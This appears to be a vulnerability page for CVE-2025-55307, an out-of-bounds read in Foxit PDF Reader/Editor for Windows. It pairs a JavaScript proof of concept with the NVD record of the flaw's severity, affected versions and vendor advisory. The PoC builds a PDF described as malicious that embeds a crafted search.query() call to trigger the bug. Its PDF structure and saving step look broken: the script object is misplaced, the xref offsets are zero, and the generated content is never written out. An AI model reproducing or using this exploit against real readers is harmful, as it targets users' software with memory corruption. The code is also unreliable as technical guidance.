CVE-2025-55307

// CVE-2025-55307 PoC - Foxit PDF search.query() Out-of-Bounds Read // This PoC creates a malicious PDF with crafted JavaScript // Target: Foxit PDF Reader/Editor for Windows < 13.2 or < 2025.2 function createMaliciousPDF() { // PDF structure with malicious JavaScript var pdfContent = "%PDF-1.7\n"; pdfContent += "1 0 obj\n<</Type/Catalog/Pages 2 0 R>>\nendobj\n"; pdfContent += "2 0 obj\n<</Type/Pages/Kids[3 0 R]/Count 1>>\nendobj\n"; pdfContent += "3 0 obj\n<</Type/Page/Parent 2 0 R/MediaBox[0 0 612 792]/Contents 4 0 R/Resources<</JavaScript 5 0 R>>>>\nendobj\n"; // Malicious JavaScript action var maliciousJS = "this.search.query('test', '/');"; pdfContent += "4 0 obj\n<</Length " + maliciousJS.length + ">>\nstream\n" + maliciousJS + "\nendstream\nendobj\n"; pdfContent += "5 0 obj\n<</Names[" + generateJSArray(maliciousJS) + "]>>\nendobj\n"; pdfContent += "xref\n0 6\n0000000000 65535 f\n"; pdfContent += "trailer\n<</Size 6/Root 1 0 R>>\nstartxref\n0\n%%EOF"; return pdfContent; } function generateJSArray(js) { return "(JS" + js.length + ")" + js; } // Save the malicious PDF var maliciousPDF = createMaliciousPDF(); app.activeDocs[0].saveAs('cve-2025-55307-poc.pdf');

{"cve": {"id": "CVE-2025-55307", "sourceIdentifier": "[email protected]", "published": "2025-12-11T16:16:25.053", "lastModified": "2026-01-06T14:39:54.230", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "An issue was discovered in Foxit PDF and Editor for Windows before 13.2 and 2025 before 2025.2. Opening a malicious PDF containing a crafted JavaScript call to search.query() with a crafted cDIPath parameter (e.g., \"/\") may cause an out-of-bounds read in internal path-parsing logic, potentially leading to information disclosure or memory corruption."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:L/I:N/A:N", "baseScore": 3.3, "baseSeverity": "LOW", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-125"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionEndIncluding": "13.1.7.23637", "matchCriteriaId": "F900FF8A-7BFA-442E-BC8C-5A3717961DD5"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionStartIncluding": "2023.1.0.15510", "versionEndIncluding": "2023.3.0.23028", "matchCriteriaId": "0C75FEE6-54F3-49C6-BAEA-A09D23BE5D64"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:*:*:*:*:*:*:*:*", "versionStartIncluding": "2024.1.0.23997", "versionEndIncluding": "2024.4.1.27687", "matchCriteriaId": "2C06BC41-9831-4AE3-B10B-3FC313D01580"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_editor:2025.1.0.27937:*:*:*:*:*:*:*", "matchCriteriaId": "9FDC914F-B999-4233-8BEA-CA20B1F0D9D3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:foxit:pdf_reader:*:*:*:*:*:*:*:*", "versionEndIncluding": "2025.1.0.27937", "matchCriteriaId": "DB827B5A-9957-43B2-A633-EF5442A2EF35"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://www.foxit.com/support/security-bulletins.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}